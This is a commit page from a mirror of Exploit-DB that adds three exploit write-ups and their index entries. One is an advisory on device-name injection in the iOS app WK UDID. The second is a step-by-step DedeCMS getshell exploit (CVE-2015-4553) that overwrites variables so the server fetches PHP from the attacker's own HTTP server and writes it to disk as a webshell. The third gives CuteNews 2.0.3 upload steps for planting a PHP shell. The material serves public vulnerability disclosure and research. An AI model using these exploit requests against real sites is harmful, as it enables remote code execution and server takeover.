bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-06

Browse source 
3 new exploits
This commit is contained in:
Offensive Security 2015-07-06 05:01:55 +00:00
parent cd8d6cadcf
commit 8ad2e6be05
4 changed files with 413 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
files.csv
View file

@ -33774,6 +33774,7 @@ id,file,description,date,author,platform,type,port
37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0
37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
@ -33820,6 +33821,7 @@ id,file,description,date,author,platform,type,port
37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-07-02,Dark-Puzzle,windows,dos,0
37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload Vulnerability",2015-07-03,T0x!c,php,webapps,80
37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-03,TheCyberNuxbie,php,webapps,0
37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0
37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow Vulnerability",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
@ -33834,3 +33836,4 @@ id,file,description,date,author,platform,type,port
37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0

Can't render this file because it is too large.

163
platforms/ios/webapps/37492.txt Executable file
View file

@ -0,0 +1,163 @@
Document Title:
===============
WK UDID v1.0.1 iOS - Command Inject Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1539
Release Date:
=============
2015-07-01
Vulnerability Laboratory ID (VL-ID):
====================================
1539
Common Vulnerability Scoring System:
====================================
5.6
Product & Service Introduction:
===============================
This app offers the opportunity to read device-specific information from your iPhone, iPad or iPod touch. The desired information can be
selected and sent via email to a recipient of your choice or it can be copied to the clipboard for later use. You can get information about
the unique identifier (UDID), the model, the name and the operating system of your device.
(Copy of the Homepage https://itunes.apple.com/us/app/wk-udid/id392624227 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a local command inject web vulnerability in the official WK UDID v1.0.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-07-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
WK EDV GmbH
Product: WK UDID - iOS Mobile Web Application 1.0.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A local command inject web vulnerability has been discovered in the official WK UDID v1.0.1 iOS mobile web-application.
The vulnerability allows to inject malicious script codes to the application-side of the vulnerable mobile app.
The vulnerability is located in the device name value of the send by mail function. Local attackers are able to manipulate the name value
of the device to compromise the mail function of the wkudid mobile app. The html encoding is broken in the send by mail export function.
Local attackers are able to manipulate the device name id to compromise the application internal validation in send emails. The attack vector
of the vulnerability is server-side and the injection point is the device name information settings.
The security risk of the local commandpath inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6.
Exploitation of the commandpath inject vulnerability requires a low privilege androidios device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
compromise the mobile iOS application and connected device components.
Vulnerable Module(s)
[+] Device - Settings - Information
Vulnerable Parameter(s)
[+] device name
Affected Module(s)
[+] WKUDID - Mail
Proof of Concept (PoC):
=======================
The local command inject web vulnerability can be exploited by local attackers with low privilege device user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start the iOS device
2. Open the settings module
3. Change the name to the local command injection payload
4. Save the settings and start the application wkudid
5. Send the details by mail
6. Review the arrival inbox
7. The execution point is the xml and header location with the device name value
8. Successful reproduce of the local command inject security vulnerability!
PoC Device ID - Email
<div>Identifier (UDID): FFFFFFFFC0463E7B3E5D46A88EDF4194C74B27D1
<br>Model: iPad<br>Name: bkm337>"<./[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE!]">%20<gt;<BR>
System Name: iPhone OS<BR>System Version: 8.3<BR>Total Memory (RAM): 987.98 MB<BR>
Free Memory: 19.06 MB<BR>Total Storage: 27.19 GB<BR>Free Storage: 0.70 GB<BR>
CPU Frequency: an error occured<BR>Network: WiFi<BR>Wi-Fi: 02:00:00:00:00:00<BR>
IP Address: 192.168.2.104<BR>Carrier: not available<BR></iframe></div>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable Device name value. Restrict the input and encode the output in the
vulnerable generated html file. Disallow script code values in the html generated file type to prevent further command injection attacks.
Security Risk:
==============
The security rsik of the local command inject web vulnerability in the device name value is estimated as medium. (CVSS 5.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

199
platforms/php/webapps/37423.txt Executable file
View file

@ -0,0 +1,199 @@
==========================
# Exploit Title: Dedecms variable coverage leads to getshell
# Date: 26-06-2015
# Vendor Homepage: http://www.dedecms.com/]
# Version: dedecms 5.7-sp1 and all old version
# CVE : CVE-2015-4553
===========================
[CVE-2015-4553]Dedecms variable coverage leads to getshell
#############################################################################
#
# DBAPPSECURITY LIMITED http://www.dbappsecurity.com.cn/
#
#############################################################################
#
# CVE ID: CVE-2015-4553
# Subject: Dedecms variable coverage leads to getshell
# Author: zise
# Date: 06.17.2015
#############################################################################
Introduction:
========
dedecms Open source cms
Extensive application
Influence version
Newest dedecms 5.7-sp1 and all old version
Remote getshell
Details:
=======
After the default installation of dedecms
Installation directory
/install/index.php
or
/install/index.php.bak
/install/index.php //run iis apache exploit
/install/index.php.bak //run apache exploit
Code analysis
/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb
#############################################################################
17 $install_demo_name = 'dedev57demo.txt';
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
here $install_demo_name and $insLockfile definition
// echo $install_demo_name; printf dedev57demo.txt
29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
30 {
31 foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
32 }
// echo $install_demo_name; printf aaaa
$install_demo_name by variable coverage
The same
17 $install_demo_name = 'dedev57demo.txt';
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
variable coverage
#############################################################################
GETSHELL Step 1 Clear file contents config_update.php
#############################################################################
config_update.php
13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
14 $linkHost = 'http://flink.dedecms.com/server_url.php';
In order to obtain the webshell need to control $updateHost
So the use of variable coverags cleared config_update.php
http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php
index.php.bak
373 else if($step==11)
374 {
375 require_once('../data/admin/config_update.php');
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
377
378 $sql_content = file_get_contents($rmurl);
379 $fp = fopen($install_demo_name,'w');
380 if(fwrite($fp,$sql_content))
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
382 else
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
384 unset($sql_content);
385 fclose($fp);
386 exit();
387 }
###
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 06:55:23 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: User-Agent
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<font color="red">[×]</font> 远程获取失败
###
###After execution file 0 byte ~ho~year~####
2015/06/17 14:55 0 config_update.php
1 file 0 byte
GETSHELL Step 2
#############################################################################
Create local HTTP services
zise:tmp zise$ ifconfig en0
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 119.253.3.18 netmask 0xffffff00 broadcast
zise:tmp zise$ mkdir "dedecms"
zise:tmp zise$ cd dedecms/
zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
zise:dedecms zise$ cd ../
zise:tmp zise$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
####
http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://119.253.3.18:8000/
####
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 07:11:18 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: Accept-Encoding,User-Agent
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<font color="green">[√]</font> 存在(您可以选择安装进行体验)
index.php.bak
373 else if($step==11)
374 {
375 require_once('../data/admin/config_update.php');
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
377
378 $sql_content = file_get_contents($rmurl);
379 $fp = fopen($install_demo_name,'w');
380 if(fwrite($fp,$sql_content)) //fwrite websehll
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
382 else
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
384 unset($sql_content);
385 fclose($fp);
386 exit();
387 }
Attack complete
you webshell
http://192.168.204.135/install/hello.php
> zise ^_^
> Security researcher
This is the vulnerability of some web pages
http://seclists.org/fulldisclosure/2015/Jun/47

48
platforms/php/webapps/37474.txt Executable file
View file

@ -0,0 +1,48 @@
CuteNews 2.0.3 Remote File Upload Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm T0x!c member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3]
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de , Ghosty , Ked ans , Caddy-dz .....
==========================================================
# Exploit :
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
1 - Sign up for New User
2 - Log In
3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
4 - Select Upload Avatar Example: Evil.jpg
5 - use tamper data & Rename File Evil.jpg to Evil.php
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php